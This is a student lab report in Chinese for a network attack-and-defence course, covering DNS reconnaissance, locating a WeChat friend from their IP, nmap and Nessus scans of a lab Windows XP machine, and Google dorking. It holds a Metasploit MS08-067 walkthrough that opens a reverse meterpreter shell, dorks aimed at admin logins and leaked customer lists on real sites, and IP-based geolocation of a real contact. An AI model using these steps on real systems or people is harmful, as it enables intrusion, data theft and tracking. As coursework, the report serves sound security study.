20232405 2024-2025-1 《网络与系统攻防技术》实验五实验报告

news/2025/11/16 16:49:31/文章来源:https://www.cnblogs.com/gaoyiming/p/19219843

1. 实验内容

（1）对任意一个DNS域名进行查询并获取一些信息
（2）查询任意社交媒体中好友的ip，并获取其所在地理位置
（3）使用nmap对靶机环境进行扫描并获取一些信息
（4）使用Nessus对靶机环境进行扫描并获取一些信息
（5）通过搜索引擎搜索自己在网上的足迹，判断自己是否有隐私泄露问题
（6）练习使用Google hack搜集技能完成搜索

2. 实践要求

（1）学会使用whois、dig、nslookup、traceroute等工具对DNS进行信息搜集
（2）学会获取联系人的ip和地理位置
（3）学会使用nmap、Nessus工具进行扫描获取信息
（4）熟练使用Google hack搜集技能进行搜索

3. 实践过程

3.1 对baidu.com进行查询并获取信息

打开装有kali镜像的虚拟机，在shell中输入whois baidu.com，可以查找到该域名的注册人和联系方式。其中whois是用于查询域名、ip等网络资源注册信息的命令

输入命令dig baidu.com查询该域名对应的一些ip，dig是用于DNS域名解析查询的命令，使用nslookup命令同样可以实现

对这四个上述查到的ip地址使用whois命令可以得到该ip的注册人、其联系方式以及所在国家、城市和具体地理位置，以上述第一个ip为例，其地址位于北京市海淀区上地十街10号百度大厦

在linux中使用traceroute baidu.com追踪到百度服务器的网络路径，中间路径没有显示的原因可能是因为这些节点配置了“禁止icmp回显”策略或者防火墙

在win中使用tracert baidu.com追踪到百度服务器的网络路径

使用UU在线工具对上述第一个ip（182.61.244.149）进行具体地理位置的查询

3.2 尝试获取微信好友的ip，并找到该好友的具体地理位置

3.2.1 获取ip

获取微信好友的ip的方法有三种：路由器抓包，wireshark抓包，资源监视器。本实验中使用资源监视器方法，打开资源监视器，并给微信好友发送信息，在资源监视器中可以看到该进程的目的ip

3.2.2 查询地址

使用查询工具查询该ip地址，发现这一IP所在地址与实际一致

3.3 使用nmap开源软件对靶机环境进行扫描，回答以下问题并给出操作命令

本实验中攻击机使用kali，靶机使用winXP，先获取一下双方的ip，并实现以下操作
在kali中使用ifconfig查看攻击机ip：192.168.217.133

在winXP中使用ipconfig查看靶机ip：192.168.217.147

3.3.1 靶机IP地址是否活跃

在kali中使用命令nmap -sn 192.168.217.0/24，不扫描端口去确认192.168.217.0/24网段中哪些主机正在运行且网络可达，其中-sn是不扫描端口的选项参数。结果发现攻击机和靶机ip都存活

3.3.2 靶机开放了哪些TCP和UDP端口

在扫描之前建议先关闭靶机中的防火墙，不然会扫描很长时间（本人亲自尝试过）

在kali中使用命令nmap -sT -sU -p- 192.168.217.147扫描所有开放的tcp和udp端口，其中-sT是tcp全连接扫描，-sU是udp端口扫描，-p-是扫描所有端口选项。结果发现开放的tcp有135/139/445，开放的udp有123/137，下面还有一些开放或者被过滤的端口

3.3.3 靶机安装了什么操作系统，版本是多少

在kali中使用命令nmap -O 192.168.217.147识别操作系统类型，其中-O是操作系统探测选项。结果显示操作系统是Microsoft Windows XP SP2 or SP3

3.3.4 靶机上安装了哪些服务

上面探测操作系统的时候就会显示有哪些服务，但是没有版本号，所以在kali中使用命令nmap -sV 192.168.217.147进行服务版本识别，其中-sV是服务版本探测选项。结果发现服务有：
135端口的msrpc（远程过程调用服务）版本是Microsoft Windows RPC
139端口的netbios-ssn（NetBIOS会话服务）版本是Microsoft Windows netbios-ssn
445端口的microsoft-ds（SMB文件共享服务）版本是Microsoft Windows XP microsoft-ds

3.4 使用Nessus开源软件对靶机环境进行扫描，回答以下问题并给出操作命令

首先根据参考资料中安装nessus的教程在kali中完成安装

3.4.1 靶机上开放了哪些端口

首先点击主页右上角new scan，之后选择host discovery

按下图进行扫描配置，target输入靶机ip，save之后开始扫描即可

扫描结果显示靶机开放的端口有：135、139、445

3.4.2 靶机各个端口上网络服务存在哪些安全漏洞（列举高危漏洞）

点击主页右上角new scan，之后选择advanced scan，并进行与上述相同的ip配置，扫描后结果如下

其中有个高危漏洞，内容是靶机运行的winXP系统已经停止被官方支持，不再推送安全补丁，存在大量未修复漏洞

还有445端口的SMB/RPC服务如下图，存在MS09-001、MS08-067、MS17-010（永恒之蓝）漏洞

3.4.3 如何攻陷靶机环境，以获得系统访问权

（1）打开kali终端，输入msfconsole启动metasploit框架。待界面加载完成后，输入search ms08-067搜索该漏洞的攻击模块，会找到exploit/windows/smb/ms08_067_netapi模块
（2）输入use exploit/windows/smb/ms08_067_netapi，加载模块。
输入set RHOSTS 192.168.217.147，设置靶机ip。
输入set PAYLOAD windows/meterpreter/reverse_tcp，配置攻击载荷以获取反弹shell。
输入ifconfig查看kali自身的ip，再输入set LHOST 192.168.217.133（攻击机ip），设置kali用于接收反弹shell的ip。
（3）输入exploit执行攻击。若攻击成功，会获得meterpreter shell，此时即获取靶机的系统级权限，之后可以进行一些系统操作验证。

3.5 通过搜索引擎搜索自己在网上的足迹

通过浏览器搜索自己的学号20232405，发现有自己在博客园发布的作业

通过浏览器搜索自己的名字，没有和本人相关的信息

3.6 使用10种Google hack搜集技能完成搜索

（1）关键词搜索。使用site:baidu.com 管理员登录搜索百度中包含“管理员登录”的页面，找到后台登录入口

（2）文件类型搜索。使用filetype:xlsx "客户名单"查找目标网站泄露的客户名单Excel文件

（3）url关键词搜索。使用inurl:admin login site:baidu.com搜索百度下URL含“admin”且页面含“login”的后台登录页

（4）标题关键词搜索。使用intitle:登录 intitle:管理员 site:gov.cn用于搜索政府网站中标题含“登录”和“管理员”的页面

（5）页面内容关键词搜索。使用intext:"debug mode"查找目标网站中含“debug mode”的页面

（6）与目标域名相关联网站的搜索。使用related:baidu.com搜索与百度相关的网站

（7）缓存页面搜索。使用cache:baidu.com/admin/login.php查看目标后台登录页的 Google 缓存版本

（8）关联链接搜索。使用link:https://www.cnblogs.com用于查找所有指向博客园官网的关联网页

（9）相关信息搜索。使用info:http://www.baidu.com得到百度的信息

（10）端口搜索。使用port:3389 site:baidu.com查找百度开放的3389端口

4. 问题及解决方案

问题一：在进行tcp/udp开放端口扫描的时候，需要的时间非常长，并且结果也不对

解决一：通过查找资料发现，需要先关闭一下靶机上的防火墙再扫描才会正常

5. 学习感悟、思考

本次实验围绕网络信息搜集与漏洞扫描、渗透测试技能展开，包含域名与ip信息搜集、获取好友IP与地理位置、nmap靶机扫描、nessus漏洞扫描、网络足迹搜索与Google Hack练习。在完成本次针对winXP靶机的漏洞扫描与渗透测试实验后，我对网络安全攻防的理解有了更深刻的体会。从nessus的安装、配置到最终利用 metasploit攻陷靶机，每一步都充满了技术的严谨性与探索的趣味性。
此外，我也意识到个人隐私保护的重要性。一些来历不明的网站等信息都可能会使我们的隐私泄露，造成不可挽回的严重后果。通过这个实验，加深了我对自己隐私保护的注意，同时也会提醒周围人防范于未然。
整个实验过程，是理论知识与实践操作的深度结合，让我从被动的知识接受者转变为主动的技术探索者。我不仅掌握了nessus的使用技巧，更重要的是培养了网络安全思维，学会从攻击者和防御者的双重角度去思考问题，这对我今后在网络安全领域的学习和实践都具有重要的指导意义。